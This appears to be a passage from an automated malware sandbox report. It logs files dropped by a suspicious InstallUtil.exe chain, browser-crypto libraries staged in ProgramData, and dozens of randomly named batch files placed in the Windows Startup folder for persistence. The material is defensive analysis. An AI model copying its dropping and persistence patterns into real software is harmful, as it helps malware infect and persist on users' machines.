                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\H07iGpAOLsi3Xl2Zht1ZcBjf.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\74A4jsUKcYxv4CUlznOidThQ.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_iscrypt.dllJump to dropped file
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_24031210275393811096.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CYjxBxbX4468KtV9KoBZh2Bv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CjpLjLpVUeATlK006BhaYHDA.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-07B68.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\7j7a6Y5ZdE9mwtxTh84g5rxP.exeJump to dropped file
                        Source: C:\Users\user\Pictures\FnzHBAPEbvEEx8ZWWEvo0R6a.exeFile created: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\UpuXhVlAiE2lL81UfJ7rqxoG.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-0QBP9.tmp\FnzHBAPEbvEEx8ZWWEvo0R6a.tmpFile created: C:\Users\user\AppData\Local\Temp\is-KGGV2.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\is-NP3DM.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\RjS1Nhdf06REy5J9bfLmGhpU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\sI7dZrzWguf80YTd4w1tJlxT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\G8aAj5L1YhrpqSPmcz12ZEUR.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\DMECl6rKVeXO0VOyuijXmPsf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\gYoelXOXnR67v6k5aVRTdw5t.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\SSEzfyhdmFgId4wuINTHaAmw.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\unins000.exe (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\xYgVykjMJXKeoDKuEBWTMXD2.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\RHfgbpolIV21eYBHVUExVm7m.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NRQOltVD0acQXnzUvV0AHMDa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\xeTqrcoVoAXPGcrKwbOVfhy2.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\flgUFRxMTOax9vom3NLtvcuv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\FIE2EI26EI4jGGv0xJtpXxXh.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\oqVEsHQBNrwNPHffhPILiRr1.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\rJjlxE1wY4HXoMWnySLKuJe5.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\cJP9SLzzak6gFJD9JFpAVvaN.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\CetLHNUiPRGPPEJBiP5m1V59.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\wG39L1YVzQJEnjZnGjsxQPIL.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\dvdyeMQ4IU05HT0hXUiampSM.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\ZNUkdRLikcOE0I8txHta42nK.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\7Ze1sBHT2zACLNmQRZlcE3Tf.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\fHmeBOFDBp1fU4tXtZW1SwCU.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\PuOhjWfV8sy4waUuI70BLeKF.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\3m556AQE7tDOPkLnbR8jRGPu.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-H9RBT.tmp\DAOYzG6VUKOTbMmRBP4iG9FF.tmpFile created: C:\Users\user\AppData\Local\Temp\is-C5JBD.tmp\_isetup\_setup64.tmpJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\vMDfzN6ieihUJhAninw4nHZX.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ydv77irsMwFsUh797bOnhxVa.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\nPlq3xTmye2f3pu3slr0k49k.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\w9kWzhn3BOumuqtEzmPZdJ7I.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\1NKkMLyw9h7c8epRkEFEngCg.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\aRNQGQYPdgEPyk2wKE0Y2RBY.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libbz2-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\TE3hLMsyayYuQeWvMvP9Nt4X.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\kMxkjYtyyi8n2ckmtmDaxJ9E.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\gd9bLSj4SZDYngCX7Y23gLEe.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Temp\is-1046M.tmp\_isetup\_shfoldr.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\bmLLVkqEoc8XwPP6fRiheZRk.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\AdDlHuzgF8lFUsmxcjVFtutw.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\03oBcB8Rvh6nT71GnuDYAwPv.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\IelNhfi6M4d6yMRgQg9Svn6Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\K7OlehBeK7vDe9ywIcEpfFfd.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\WHjVEyd48wD2Vps4mOrN0xgt.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\is-FJQA6.tmp\fwUkFVOLVOFs3NY104r7giRJ.tmpFile created: C:\Users\user\AppData\Local\Web Link Analyzer\libwinpthread-1.dll (copy)Jump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\13TZhjPb0HxkQlPqajCRkSnB.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\qEZDdAWnBbu94XDsWbevAW3Z.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\i7KTy1Vb7MGYU7JDB8adhZqD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\6Q8Wwld29CZNDuak3WcfH07i.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\Pictures\JmSupDwlA9Oqy8L5plKWP6Oj.exeJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\Opera_installer_2403121027455829404.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\zON35BfDXHyPfdPSNEInc2BT.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\Ae4UYt4QuRmNhlRoOAHyWthz.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Local\NqsfoMYypS05t81TJmKPA8xv.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exeFile created: C:\ProgramData\DirectSoundDriver 2.36.198.67\DirectSoundDriver 2.36.198.67.exeJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128321\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403121128141\opera_packageJump to dropped file
                        Source: C:\Users\user\Pictures\MX6OxFuxXLJNkbD9F2dPLyyC.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112746972.log
                        Source: C:\Users\user\Pictures\51fuIpAxuIxVSFNlFyLCdDUf.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112756158.log
                        Source: C:\Users\user\Pictures\8aNg0kr81H7icHssfXxzSpJA.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112813759.log
                        Source: C:\Users\user\Pictures\1EkTthwf6man8aNjDkP3iYby.exeFile created: C:\Users\user\AppData\Local\Temp\.opera\Opera Installer\opera_installer_20240312112809817.log

                        Boot Survival

                        Source: C:\Users\user\AppData\Local\Web Link Analyzer\weblinkanalyzer.exe | Code function: 16_2_00401A4F CreateFileA,DeviceIoControl,GetLastError,FindCloseChangeNotification, \\.\PhysicalDrive0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CizbWvvGUnk05BM6mZJPptaz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2ivxKjIFzltkDEA2JxwPp8hh.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VcZwTQ1Borjv2y0HnBVtpR2m.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rkJ56qyUQvOtS5TAPobyZHxi.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lo2UTsMDlN4zzEXKzfmqog6U.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RqL7mk3tF50auCgY9TJx4Xx5.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JZs2BdtaVoF2513D2RlX46qg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YM0LEQEFQcy2LayzrWJLzr2X.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OqCKxxB7rjibzQ1Dve4DDO9p.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\kYlPDGvk41C0TPxT1reEBFhp.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\v4bWLa58H6i1mhTHOnasQ1vq.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAr643SNguCt1xm73LKTPAoT.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\i3pPAKGnPRFkr8xt7bRSlRjc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\L60mOnprETYU8PVSXxv1TKgu.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N4oRjvZiiIUiuyH7qY2tJVxP.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDJLaHZLLtRSKU5ceCcvYzy0.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rU6sAXL8ShxvNSFxfztITQEO.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cJFsupPdhex8QpEWXObWONd1.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8952IHdifzCOHTQvuvHXTJ1g.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\F2SoYI0VgAOawpvWVdJVVDIM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8IR6x2FHYB42LL3QeY8fNCg.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mm7BesjycQWolvzqUxLCJN2V.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mEdWQV0gAnTaAGqJjmojBkRB.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QKgxCepPfryutV6Yrct1aQ8O.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nDxlT2zfYNUQnGhPw0ddY3Jk.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ff4HfnvNq5FdWodG1vRYL2NM.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nz2Ckg7fITBXGmFKoxjG1u00.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Ii1KL5uilzCRnH7PuS8IaglH.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\OOHyKTaNRs5i380w7sfoSTrE.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tAqt6IonJ28ek47HWmcHedgJ.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\oOhQXmnGTZctAq7jzm8VemBz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2JYRr5VJQzScOorgs63t6Yms.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7XCwIQMtq8JrfsfhMk9tIIOj.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MVSTH2OU1514cyfdjHdKKLX6.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MD3aZCK2o3gddU7wGrkeXuBH.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dqz7fQjdgpBOVOEwVuzrvS7L.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpmbygrB8VoHP1SuBe596Iom.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6dNGtLUaCGiNt5X3GAVfN2mx.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\huKfpDIvxQDlEFuk0ExAiyiY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EFETrEauohMUCVpzszudURYY.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rbuXaEpUYfBvSLY1BSq9FAGz.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tMnW1nNhCxc57ShEccGmAfuc.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6YVbkJ2dbTU6iPJjmiDFc28v.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pIWBIkjKkw1pyL67X81LlMuW.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7BA8WVult1sLOauGc9twvjXt.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BG4uaPJ9Dk2ZtFkFmXZqJQN5.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\C5bXmg8WFq8GqSN4su9KEIhK.bat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lJKdZUxmZnY2NKvxLXDrjSku.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\otmHh8LJXxRmJ6wgqiU2xXNN.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fV1IOv3XzX0dw8cL656hlcGA.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tpxByPiHTfm0FXRZ9jVXDXqE.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\t848D57sRdga678o3iuE8fs0.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rVcxREh2h9e98HI2JvGb21V7.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KFn3QrubYABzdRE1O31cNxVg.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\A6JhBFTT0ahcL4Jx3VU57fvL.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\THlJn0bCoJMkwaJJ1damaKHf.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HEiHPMqfTU2BUzEni0ygFieY.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\J3V1pdpFAtBTREkflB9t911H.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2BAkuvvH6sPJYNmpYSkgEcI5.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tCfx7C0T7ChpGlE7H15p1O5u.batJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\gZtCFxlqR0Jhzrk0e43UouaM.batJump to dropped file
